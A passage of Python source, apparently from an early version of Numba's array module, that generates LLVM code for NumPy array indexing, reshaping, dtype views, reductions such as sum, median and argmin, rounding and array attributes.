return indices, counts
def end_loops(self):
for i in reversed(self.indexers):
i.loop_tail()
def fancy_getitem(context, builder, sig, args,
aryty, ary, index_types, indices):
shapes = cgutils.unpack_tuple(builder, ary.shape)
strides = cgutils.unpack_tuple(builder, ary.strides)
data = ary.data
indexer = FancyIndexer(context, builder, aryty, ary,
index_types, indices)
indexer.prepare()
# Construct output array
out_ty = sig.return_type
out_shapes = indexer.get_shape()
out = _empty_nd_impl(context, builder, out_ty, out_shapes)
out_data = out.data
out_idx = cgutils.alloca_once_value(builder,
context.get_constant(types.intp, 0))
# Loop on source and copy to destination
indices, _ = indexer.begin_loops()
# No need to check for wraparound, as the indexers all ensure
# a positive index is returned.
ptr = cgutils.get_item_pointer2(builder, data, shapes, strides,
aryty.layout, indices, wraparound=False)
val = load_item(context, builder, aryty, ptr)
# Since the destination is C-contiguous, no need for multi-dimensional
# indexing.
cur = builder.load(out_idx)
ptr = builder.gep(out_data, [cur])
store_item(context, builder, out_ty, val, ptr)
next_idx = builder.add(cur, context.get_constant(types.intp, 1))
builder.store(next_idx, out_idx)
indexer.end_loops()
return impl_ret_new_ref(context, builder, out_ty, out._getvalue())
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.Array))
def fancy_getitem_array(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, ary)
out_ty = sig.return_type
return fancy_getitem(context, builder, sig, args,
aryty, ary, (idxty,), (idx,))
def fancy_setslice(context, builder, sig, args, index_types, indices):
"""
Implement slice assignment for arrays. This implementation works for
basic as well as fancy indexing, since there's no functional difference
between the two for indexed assignment.
"""
aryty, _, srcty = sig.args
ary, _, src = args
ary = make_array(aryty)(context, builder, ary)
dest_shapes = cgutils.unpack_tuple(builder, ary.shape)
dest_strides = cgutils.unpack_tuple(builder, ary.strides)
dest_data = ary.data
indexer = FancyIndexer(context, builder, aryty, ary,
index_types, indices)
indexer.prepare()
if isinstance(srcty, types.Buffer):
# Source is an array
src = make_array(srcty)(context, builder, src)
src_shapes = cgutils.unpack_tuple(builder, src.shape)
src_strides = cgutils.unpack_tuple(builder, src.strides)
src_data = src.data
src_dtype = srcty.dtype
# Check shapes are equal
index_shape = indexer.get_shape()
shape_error = cgutils.false_bit
assert len(index_shape) == len(src_shapes)
for u, v in zip(src_shapes, index_shape):
shape_error = builder.or_(shape_error,
builder.icmp_signed('!=', u, v))
with builder.if_then(shape_error, likely=False):
msg = "cannot assign slice from input of different size"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
def src_getitem(source_indices):
assert len(source_indices) == srcty.ndim
src_ptr = cgutils.get_item_pointer2(builder, src_data,
src_shapes, src_strides,
srcty.layout, source_indices,
wraparound=False)
return load_item(context, builder, srcty, src_ptr)
else:
# Source is a scalar (broadcast or not, depending on destination
# shape).
src_dtype = srcty
def src_getitem(source_indices):
return src
# Loop on destination and copy from source to destination
dest_indices, counts = indexer.begin_loops()
# Source is iterated in natural order
source_indices = tuple(c for c in counts if c is not None)
val = src_getitem(source_indices)
# Cast to the destination dtype (cross-dtype slice assignement is allowed)
val = context.cast(builder, val, src_dtype, aryty.dtype)
# No need to check for wraparound, as the indexers all ensure
# a positive index is returned.
dest_ptr = cgutils.get_item_pointer2(builder, dest_data,
dest_shapes, dest_strides,
aryty.layout, dest_indices,
wraparound=False)
store_item(context, builder, aryty, val, dest_ptr)
indexer.end_loops()
return context.get_dummy_value()
#-------------------------------------------------------------------------------
# Shape / layout altering
@builtin
@implement('array.transpose', types.Kind(types.Array))
def array_transpose(context, builder, sig, args):
return array_T(context, builder, sig.args[0], args[0])
def array_T(context, builder, typ, value):
if typ.ndim <= 1:
res = value
else:
ary = make_array(typ)(context, builder, value)
ret = make_array(typ)(context, builder)
shapes = cgutils.unpack_tuple(builder, ary.shape, typ.ndim)
strides = cgutils.unpack_tuple(builder, ary.strides, typ.ndim)
populate_array(ret,
data=ary.data,
shape=cgutils.pack_array(builder, shapes[::-1]),
strides=cgutils.pack_array(builder, strides[::-1]),
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
res = ret._getvalue()
return impl_ret_borrowed(context, builder, typ, res)
builtin_attr(impl_attribute(types.Kind(types.Array), 'T')(array_T))
def _attempt_nocopy_reshape(context, builder, aryty, ary, newnd, newshape,
newstrides):
"""
Call into Numba_attempt_nocopy_reshape() for the given array type
and instance, and the specified new shape. The array pointed to
by *newstrides* will be filled up if successful.
"""
ll_intp = context.get_value_type(types.intp)
ll_intp_star = ll_intp.as_pointer()
ll_intc = context.get_value_type(types.intc)
fnty = lc.Type.function(ll_intc, [ll_intp, ll_intp_star, ll_intp_star,
ll_intp, ll_intp_star, ll_intp_star,
ll_intp, ll_intc])
fn = builder.module.get_or_insert_function(
fnty, name="numba_attempt_nocopy_reshape")
nd = lc.Constant.int(ll_intp, aryty.ndim)
shape = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('shape'), 0, 0)
strides = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('strides'), 0, 0)
newnd = lc.Constant.int(ll_intp, newnd)
newshape = cgutils.gep_inbounds(builder, newshape, 0, 0)
newstrides = cgutils.gep_inbounds(builder, newstrides, 0, 0)
is_f_order = lc.Constant.int(ll_intc, 0)
res = builder.call(fn, [nd, shape, strides,
newnd, newshape, newstrides,
ary.itemsize, is_f_order])
return res
@builtin
@implement('array.reshape', types.Kind(types.Array), types.Kind(types.BaseTuple))
def array_reshape(context, builder, sig, args):
aryty = sig.args[0]
retty = sig.return_type
shapety = sig.args[1]
shape = args[1]
ll_intp = context.get_value_type(types.intp)
ll_shape = lc.Type.array(ll_intp, shapety.count)
ary = make_array(aryty)(context, builder, args[0])
# XXX unknown dimension (-1) is unhandled
# Check requested size
newsize = lc.Constant.int(ll_intp, 1)
for s in cgutils.unpack_tuple(builder, shape):
newsize = builder.mul(newsize, s)
size = lc.Constant.int(ll_intp, 1)
for s in cgutils.unpack_tuple(builder, ary.shape):
size = builder.mul(size, s)
fail = builder.icmp_unsigned('!=', size, newsize)
with builder.if_then(fail):
msg = "total size of new array must be unchanged"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
newnd = shapety.count
newshape = cgutils.alloca_once(builder, ll_shape)
builder.store(shape, newshape)
newstrides = cgutils.alloca_once(builder, ll_shape)
ok = _attempt_nocopy_reshape(context, builder, aryty, ary, newnd,
newshape, newstrides)
fail = builder.icmp_unsigned('==', ok, lc.Constant.int(ok.type, 0))
with builder.if_then(fail):
msg = "incompatible shape for array"
context.call_conv.return_user_exc(builder, NotImplementedError, (msg,))
ret = make_array(retty)(context, builder)
populate_array(ret,
data=ary.data,
shape=builder.load(newshape),
strides=builder.load(newstrides),
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
res = ret._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
def _change_dtype(context, builder, oldty, newty, ary):
"""
Attempt to fix up *ary* for switching from *oldty* to *newty*.
See Numpy's array_descr_set()
(np/core/src/multiarray/getset.c).
Attempt to fix the array's shape and strides for a new dtype.
False is returned on failure, True on success.
"""
assert oldty.ndim == newty.ndim
assert oldty.layout == newty.layout
new_layout = ord(newty.layout)
any_layout = ord('A')
c_layout = ord('C')
f_layout = ord('F')
int8 = types.int8
def imp(nd, dims, strides, old_itemsize, new_itemsize, layout):
# Attempt to update the layout due to limitation of the numba
# type system.
if layout == any_layout:
# Test rightmost stride to be contiguous
if strides[-1] == old_itemsize:
# Process this as if it is C contiguous
layout = int8(c_layout)
# Test leftmost stride to be F contiguous
elif strides[0] == old_itemsize:
# Process this as if it is F contiguous
layout = int8(f_layout)
if old_itemsize != new_itemsize and (layout == any_layout or nd == 0):
return False
if layout == c_layout:
i = nd - 1
else:
i = 0
if new_itemsize < old_itemsize:
# If it is compatible, increase the size of the dimension
# at the end (or at the front if F-contiguous)
if (old_itemsize % new_itemsize) != 0:
return False
newdim = old_itemsize // new_itemsize
dims[i] *= newdim
strides[i] = new_itemsize
elif new_itemsize > old_itemsize:
# Determine if last (or first if F-contiguous) dimension
# is compatible
bytelength = dims[i] * old_itemsize
if (bytelength % new_itemsize) != 0:
return False
dims[i] = bytelength // new_itemsize
strides[i] = new_itemsize
else:
# Same item size: nothing to do (this also works for
# non-contiguous arrays).
pass
return True
old_itemsize = context.get_constant(types.intp,
get_itemsize(context, oldty))
new_itemsize = context.get_constant(types.intp,
get_itemsize(context, newty))
nd = context.get_constant(types.intp, newty.ndim)
shape_data = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('shape'),
0, 0)
strides_data = cgutils.gep_inbounds(builder,
ary._get_ptr_by_name('strides'), 0, 0)
shape_strides_array_type = types.Array(dtype=types.intp, ndim=1, layout='C')
arycls = context.make_array(shape_strides_array_type)
shape_constant = cgutils.pack_array(builder,
[context.get_constant(types.intp,
newty.ndim)])
sizeof_intp = context.get_abi_sizeof(context.get_data_type(types.intp))
sizeof_intp = context.get_constant(types.intp, sizeof_intp)
strides_constant = cgutils.pack_array(builder, [sizeof_intp])
shape_ary = arycls(context, builder)
populate_array(shape_ary,
data=shape_data,
shape=shape_constant,
strides=strides_constant,
itemsize=sizeof_intp,
meminfo=None)
strides_ary = arycls(context, builder)
populate_array(strides_ary,
data=strides_data,
shape=shape_constant,
strides=strides_constant,
itemsize=sizeof_intp,
meminfo=None)
shape = shape_ary._getvalue()
strides = strides_ary._getvalue()
args = [nd, shape, strides, old_itemsize, new_itemsize,
context.get_constant(types.int8, new_layout)]
sig = signature(types.boolean,
types.intp, # nd
shape_strides_array_type, # dims
shape_strides_array_type, # strides
types.intp, # old_itemsize
types.intp, # new_itemsize
types.int8, # layout
)
res = context.compile_internal(builder, imp, sig, args)
update_array_info(newty, ary)
res = impl_ret_borrowed(context, builder, sig.return_type, res)
return res
@builtin
@implement('array.view', types.Kind(types.Array), types.Kind(types.DTypeSpec))
def array_view(context, builder, sig, args):
aryty = sig.args[0]
retty = sig.return_type
ary = make_array(aryty)(context, builder, args[0])
ret = make_array(retty)(context, builder)
# Copy all fields, casting the "data" pointer appropriately
fields = set(ret._datamodel._fields)
for k in sorted(fields):
val = getattr(ary, k)
if k == 'data':
ptrty = ret.data.type
ret.data = builder.bitcast(val, ptrty)
else:
setattr(ret, k, val)
ok = _change_dtype(context, builder, aryty, retty, ret)
fail = builder.icmp_unsigned('==', ok, lc.Constant.int(ok.type, 0))
with builder.if_then(fail):
msg = "new type not compatible with array"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
res = ret._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
#-------------------------------------------------------------------------------
# Computations
@builtin
@implement(numpy.sum, types.Kind(types.Array))
@implement("array.sum", types.Kind(types.Array))
def array_sum(context, builder, sig, args):
zero = sig.return_type(0)
def array_sum_impl(arr):
c = zero
for v in arr.flat:
c += v
return c
res = context.compile_internal(builder, array_sum_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.prod, types.Kind(types.Array))
@implement("array.prod", types.Kind(types.Array))
def array_prod(context, builder, sig, args):
def array_prod_impl(arr):
c = 1
for v in arr.flat:
c *= v
return c
res = context.compile_internal(builder, array_prod_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.cumsum, types.Kind(types.Array))
@implement("array.cumsum", types.Kind(types.Array))
def array_cumsum(context, builder, sig, args):
scalar_dtype = sig.return_type.dtype
dtype = as_dtype(scalar_dtype)
zero = scalar_dtype(0)
def array_cumsum_impl(arr):
size = 1
for i in arr.shape:
size = size * i
out = numpy.empty(size, dtype)
c = zero
for idx, v in enumerate(arr.flat):
c += v
out[idx] = c
return out
res = context.compile_internal(builder, array_cumsum_impl, sig, args,
locals=dict(c=scalar_dtype))
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.cumprod, types.Kind(types.Array))
@implement("array.cumprod", types.Kind(types.Array))
def array_cumprod(context, builder, sig, args):
scalar_dtype = sig.return_type.dtype
dtype = as_dtype(scalar_dtype)
def array_cumprod_impl(arr):
size = 1
for i in arr.shape:
size = size * i
out = numpy.empty(size, dtype)
c = 1
for idx, v in enumerate(arr.flat):
c *= v
out[idx] = c
return out
res = context.compile_internal(builder, array_cumprod_impl, sig, args,
locals=dict(c=scalar_dtype))
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.mean, types.Kind(types.Array))
@implement("array.mean", types.Kind(types.Array))
def array_mean(context, builder, sig, args):
zero = sig.return_type(0)
def array_mean_impl(arr):
# Can't use the naive `arr.sum() / arr.size`, as it would return
# a wrong result on integer sum overflow.
c = zero
for v in arr.flat:
c += v
return c / arr.size
res = context.compile_internal(builder, array_mean_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.var, types.Kind(types.Array))
@implement("array.var", types.Kind(types.Array))
def array_var(context, builder, sig, args):
def array_var_impl(arry):
# Compute the mean
m = arry.mean()
# Compute the sum of square diffs
ssd = 0
for v in arry.flat:
ssd += (v - m) ** 2
return ssd / arry.size
res = context.compile_internal(builder, array_var_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.std, types.Kind(types.Array))
@implement("array.std", types.Kind(types.Array))
def array_std(context, builder, sig, args):
def array_std_impl(arry):
return arry.var() ** 0.5
res = context.compile_internal(builder, array_std_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.min, types.Kind(types.Array))
@implement("array.min", types.Kind(types.Array))
def array_min(context, builder, sig, args):
ty = sig.args[0].dtype
if isinstance(ty, (types.NPDatetime, types.NPTimedelta)):
# NaT is smaller than every other value, but it is
# ignored as far as min() is concerned.
nat = ty('NaT')
def array_min_impl(arry):
min_value = nat
it = arry.flat
for v in it:
if v != nat:
min_value = v
break
for v in it:
if v != nat and v < min_value:
min_value = v
return min_value
else:
def array_min_impl(arry):
for v in arry.flat:
min_value = v
break
for v in arry.flat:
if v < min_value:
min_value = v
return min_value
res = context.compile_internal(builder, array_min_impl, sig, args)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.max, types.Kind(types.Array))
@implement("array.max", types.Kind(types.Array))
def array_max(context, builder, sig, args):
def array_max_impl(arry):
for v in arry.flat:
max_value = v
break
for v in arry.flat:
if v > max_value:
max_value = v
return max_value
res = context.compile_internal(builder, array_max_impl, sig, args)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.argmin, types.Kind(types.Array))
@implement("array.argmin", types.Kind(types.Array))
def array_argmin(context, builder, sig, args):
ty = sig.args[0].dtype
# NOTE: Under Numpy < 1.10, argmin() is inconsistent with min() on NaT values:
# https://github.com/numpy/numpy/issues/6030
if (numpy_version >= (1, 10) and
isinstance(ty, (types.NPDatetime, types.NPTimedelta))):
# NaT is smaller than every other value, but it is
# ignored as far as argmin() is concerned.
nat = ty('NaT')
def array_argmin_impl(arry):
min_value = nat
min_idx = 0
it = arry.flat
idx = 0
for v in it:
if v != nat:
min_value = v
min_idx = idx
idx += 1
break
idx += 1
for v in it:
if v != nat and v < min_value:
min_value = v
min_idx = idx
idx += 1
return min_idx
else:
def array_argmin_impl(arry):
for v in arry.flat:
min_value = v
min_idx = 0
break
idx = 0
for v in arry.flat:
if v < min_value:
min_value = v
min_idx = idx
idx += 1
return min_idx
res = context.compile_internal(builder, array_argmin_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.argmax, types.Kind(types.Array))
@implement("array.argmax", types.Kind(types.Array))
def array_argmax(context, builder, sig, args):
def array_argmax_impl(arry):
for v in arry.flat:
max_value = v
max_idx = 0
break
idx = 0
for v in arry.flat:
if v > max_value:
max_value = v
max_idx = idx
idx += 1
return max_idx
res = context.compile_internal(builder, array_argmax_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.median, types.Kind(types.Array))
def array_median(context, builder, sig, args):
def partition(A, low, high):
mid = (low+high) // 2
# median of three {low, middle, high}
LM = A[low] <= A[mid]
MH = A[mid] <= A[high]
LH = A[low] <= A[high]
if LM == MH:
median3 = mid
elif LH != LM:
median3 = low
else:
median3 = high
# choose median3 as the pivot
A[high], A[median3] = A[median3], A[high]
x = A[high]
i = low
for j in range(low, high):
if A[j] <= x:
A[i], A[j] = A[j], A[i]
i += 1
A[i], A[high] = A[high], A[i]
return i
sig_partition = typing.signature(types.intp, *(sig.args[0], types.intp, types.intp))
_partition = context.compile_subroutine(builder, partition, sig_partition)
def select(arry, k):
n = arry.shape[0]
# XXX: assuming flat array till array.flatten is implemented
# temp_arry = arry.flatten()
temp_arry = arry.copy()
high = n-1
low = 0
# NOTE: high is inclusive
i = _partition(temp_arry, low, high)
while i != k:
if i < k:
low = i+1
i = _partition(temp_arry, low, high)
else:
high = i-1
i = _partition(temp_arry, low, high)
return temp_arry[k]
sig_select = typing.signature(sig.args[0].dtype, *(sig.args[0], types.intp))
_select = context.compile_subroutine(builder, select, sig_select)
def median(arry):
n = arry.shape[0]
if n % 2 == 0:
return (_select(arry, n//2 - 1) + _select(arry, n//2))/2
else:
return _select(arry, n//2)
res = context.compile_internal(builder, median, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
def _np_round_intrinsic(tp):
# np.round() always rounds half to even
return "llvm.rint.f%d" % (tp.bitwidth,)
def _np_round_float(context, builder, tp, val):
llty = context.get_value_type(tp)
module = builder.module
fnty = lc.Type.function(llty, [llty])
fn = module.get_or_insert_function(fnty, name=_np_round_intrinsic(tp))
return builder.call(fn, (val,))
@builtin
@implement(numpy.round, types.Kind(types.Float))
def scalar_round_unary(context, builder, sig, args):
res = _np_round_float(context, builder, sig.args[0], args[0])
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Integer))
def scalar_round_unary(context, builder, sig, args):
res = args[0]
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Complex))
def scalar_round_unary_complex(context, builder, sig, args):
fltty = sig.args[0].underlying_float
cplx_cls = context.make_complex(sig.args[0])
z = cplx_cls(context, builder, args[0])
z.real = _np_round_float(context, builder, fltty, z.real)
z.imag = _np_round_float(context, builder, fltty, z.imag)
res = z._getvalue()
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Float), types.Kind(types.Integer))
@implement(numpy.round, types.Kind(types.Integer), types.Kind(types.Integer))
def scalar_round_binary_float(context, builder, sig, args):
def round_ndigits(x, ndigits):
if math.isinf(x) or math.isnan(x):
return x
# NOTE: this is CPython's algorithm, but perhaps this is overkill
# when emulating Numpy's behaviour.
if ndigits >= 0:
if ndigits > 22:
# pow1 and pow2 are each safe from overflow, but
# pow1*pow2 ~= pow(10.0, ndigits) might overflow.
pow1 = 10.0 ** (ndigits - 22)
pow2 = 1e22
else:
pow1 = 10.0 ** ndigits
pow2 = 1.0
y = (x * pow1) * pow2
if math.isinf(y):
return x
return (numpy.round(y) / pow2) / pow1
else:
pow1 = 10.0 ** (-ndigits)
y = x / pow1
return numpy.round(y) * pow1
res = context.compile_internal(builder, round_ndigits, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Complex), types.Kind(types.Integer))
def scalar_round_binary_complex(context, builder, sig, args):
def round_ndigits(z, ndigits):
return complex(numpy.round(z.real, ndigits),
numpy.round(z.imag, ndigits))
res = context.compile_internal(builder, round_ndigits, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Array), types.Kind(types.Integer),
types.Kind(types.Array))
def array_round(context, builder, sig, args):
def array_round_impl(arr, decimals, out):
if arr.shape != out.shape:
raise ValueError("invalid output shape")
for index, val in numpy.ndenumerate(arr):
out[index] = numpy.round(val, decimals)
return out
res = context.compile_internal(builder, array_round_impl, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.sinc, types.Kind(types.Array))
def array_sinc(context, builder, sig, args):
def array_sinc_impl(arr):
out = numpy.zeros_like(arr)
for index, val in numpy.ndenumerate(arr):
out[index] = numpy.sinc(val)
return out
res = context.compile_internal(builder, array_sinc_impl, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.sinc, types.Kind(types.Number))
def scalar_sinc(context, builder, sig, args):
scalar_dtype = sig.return_type
def scalar_sinc_impl(val):
if numpy.fabs(val) == 0.e0: # to match np impl
val = 1e-20
val *= numpy.pi # np sinc is the normalised variant
return numpy.sin(val)/val
res = context.compile_internal(builder, scalar_sinc_impl, sig, args,
locals=dict(c=scalar_dtype))
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.nonzero, types.Kind(types.Array))
@implement("array.nonzero", types.Kind(types.Array))
@implement(numpy.where, types.Kind(types.Array))
def array_nonzero(context, builder, sig, args):
aryty = sig.args[0]
# Return type is a N-tuple of 1D C-contiguous arrays
retty = sig.return_type
outaryty = retty.dtype
ndim = aryty.ndim
nouts = retty.count
ary = make_array(aryty)(context, builder, args[0])
shape = cgutils.unpack_tuple(builder, ary.shape)
strides = cgutils.unpack_tuple(builder, ary.strides)
data = ary.data
layout = aryty.layout
# First count the number of non-zero elements
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
count = cgutils.alloca_once_value(builder, zero)
with cgutils.loop_nest(builder, shape, zero.type) as indices:
ptr = cgutils.get_item_pointer2(builder, data, shape, strides,
layout, indices)
val = load_item(context, builder, aryty, ptr)
nz = context.is_true(builder, aryty.dtype, val)
with builder.if_then(nz):
builder.store(builder.add(builder.load(count), one), count)
# Then allocate output arrays of the right size
out_shape = (builder.load(count),)
outs = [_empty_nd_impl(context, builder, outaryty, out_shape)._getvalue()
for i in range(nouts)]
outarys = [make_array(outaryty)(context, builder, out) for out in outs]
out_datas = [out.data for out in outarys]
# And fill them up
index = cgutils.alloca_once_value(builder, zero)
with cgutils.loop_nest(builder, shape, zero.type) as indices:
ptr = cgutils.get_item_pointer2(builder, data, shape, strides,
layout, indices)
val = load_item(context, builder, aryty, ptr)
nz = context.is_true(builder, aryty.dtype, val)
with builder.if_then(nz):
# Store element indices in output arrays
if not indices:
# For a 0-d array, store 0 in the unique output array
indices = (zero,)
cur = builder.load(index)
for i in range(nouts):
ptr = cgutils.get_item_pointer2(builder, out_datas[i],
out_shape, (),
'C', [cur])
store_item(context, builder, outaryty, indices[i], ptr)
builder.store(builder.add(cur, one), index)
tup = context.make_tuple(builder, sig.return_type, outs)
return impl_ret_new_ref(context, builder, sig.return_type, tup)
@builtin
@implement(numpy.where, types.Kind(types.Array),
types.Kind(types.Array), types.Kind(types.Array))
def array_where(context, builder, sig, args):
layouts = set(a.layout for a in sig.args)
if layouts == set('C'):
# Faster implementation for C-contiguous arrays
def where_impl(cond, x, y):
shape = cond.shape
if x.shape != shape or y.shape != shape:
raise ValueError("all inputs should have the same shape")
res = numpy.empty_like(x)
cf = cond.flat
xf = x.flat
yf = y.flat
rf = res.flat
for i in range(cond.size):
rf[i] = xf[i] if cf[i] else yf[i]
return res
else:
def where_impl(cond, x, y):
shape = cond.shape
if x.shape != shape or y.shape != shape:
raise ValueError("all inputs should have the same shape")
res = numpy.empty_like(x)
for idx, c in numpy.ndenumerate(cond):
res[idx] = x[idx] if c else y[idx]
return res
res = context.compile_internal(builder, where_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
#-------------------------------------------------------------------------------
# Array attributes
@builtin_attr
@impl_attribute(types.Kind(types.Array), "dtype", types.Kind(types.DType))
def array_dtype(context, builder, typ, value):
res = context.get_dummy_value()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "shape", types.Kind(types.UniTuple))
@impl_attribute(types.Kind(types.MemoryView), "shape", types.Kind(types.UniTuple))
def array_shape(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.shape
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "strides", types.Kind(types.UniTuple))
@impl_attribute(types.Kind(types.MemoryView), "strides", types.Kind(types.UniTuple))
def array_strides(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.strides
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "ndim", types.intp)
@impl_attribute(types.Kind(types.MemoryView), "ndim", types.intp)
def array_ndim(context, builder, typ, value):
res = context.get_constant(types.intp, typ.ndim)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "size", types.intp)
def array_size(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.nitems
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "itemsize", types.intp)
@impl_attribute(types.Kind(types.MemoryView), "itemsize", types.intp)
def array_itemsize(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.itemsize
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "nbytes", types.intp)
def array_nbytes(context, builder, typ, value):
"""
nbytes = size * itemsize
"""
arrayty = make_array(typ)
array = arrayty(context, builder, value)
dims = cgutils.unpack_tuple(builder, array.shape, typ.ndim)
res = builder.mul(array.nitems, array.itemsize)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "contiguous", types.boolean)
def array_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "c_contiguous", types.boolean)
def array_c_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_c_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "f_contiguous", types.boolean)
def array_f_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_f_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "readonly", types.boolean)
def array_readonly(context, builder, typ, value):
res = context.get_constant(types.boolean, not typ.mutable)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "ctypes",
types.Kind(types.ArrayCTypes))
def array_ctypes(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
# Cast void* data to uintp
addr = builder.ptrtoint(array.data, context.get_value_type(types.uintp))
# Create new ArrayCType structure
ctinfo_type = cgutils.create_struct_proxy(types.ArrayCTypes(typ))
ctinfo = ctinfo_type(context, builder)
ctinfo.data = addr
res = ctinfo._getvalue()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "flags", types.Kind(types.ArrayFlags))
def array_flags(context, builder, typ, value):
res = context.get_dummy_value()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayCTypes), "data", types.uintp)
def array_ctypes_data(context, builder, typ, value):
ctinfo_type = cgutils.create_struct_proxy(typ)
ctinfo = ctinfo_type(context, builder, value=value)
res = ctinfo.data
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayFlags), "contiguous", types.boolean)
@impl_attribute(types.Kind(types.ArrayFlags), "c_contiguous", types.boolean)
def array_ctypes_data(context, builder, typ, value):
val = typ.array_type.layout == 'C'
res = context.get_constant(types.boolean, val)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayFlags), "f_contiguous", types.boolean)
def array_ctypes_data(context, builder, typ, value):
layout = typ.array_type.layout
val = layout == 'F' if typ.array_type.ndim > 1 else layout in 'CF'
res = context.get_constant(types.boolean, val)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute_generic(types.Kind(types.Array))
def array_record_getattr(context, builder, typ, value, attr):
"""
Generic getattr() implementation for record arrays: fetch the given
record member, i.e. a subarray.
"""
arrayty = make_array(typ)
array = arrayty(context, builder, value)
rectype = typ.dtype
if not isinstance(rectype, types.Record):
raise AttributeError("attribute %r of %s not defined" % (attr, typ))
dtype = rectype.typeof(attr)
offset = rectype.offset(attr)
resty = typ.copy(dtype=dtype, layout='A')
raryty = make_array(resty)
rary = raryty(context, builder)
constoffset = context.get_constant(types.intp, offset)
llintp = context.get_value_type(types.intp)
newdata = builder.add(builder.ptrtoint(array.data, llintp), constoffset)
newdataptr = builder.inttoptr(newdata, rary.data.type)
datasize = context.get_abi_sizeof(context.get_data_type(dtype))
populate_array(rary,
data=newdataptr,
shape=array.shape,
strides=array.strides,
itemsize=context.get_constant(types.intp, datasize),
meminfo=array.meminfo,
parent=array.parent)
res = rary._getvalue()
return impl_ret_borrowed(context, builder, typ, res)
#-------------------------------------------------------------------------------
# Comparisons
@builtin
@implement('is', types.Kind(types.Array), types.Kind(types.Array))
def array_is(context, builder, sig, args):
aty, bty = sig.args
if aty != bty:
return cgutils.false_bit
def array_is_impl(a, b):
return (a.shape == b.shape and
a.strides == b.strides and
a.ctypes.data == b.ctypes.data)
return context.compile_internal(builder, array_is_impl, sig, args)
#-------------------------------------------------------------------------------
# builtin `numpy.flat` implementation
def make_array_flat_cls(flatiterty):
"""
Return the Structure representation of the given *flatiterty* (an
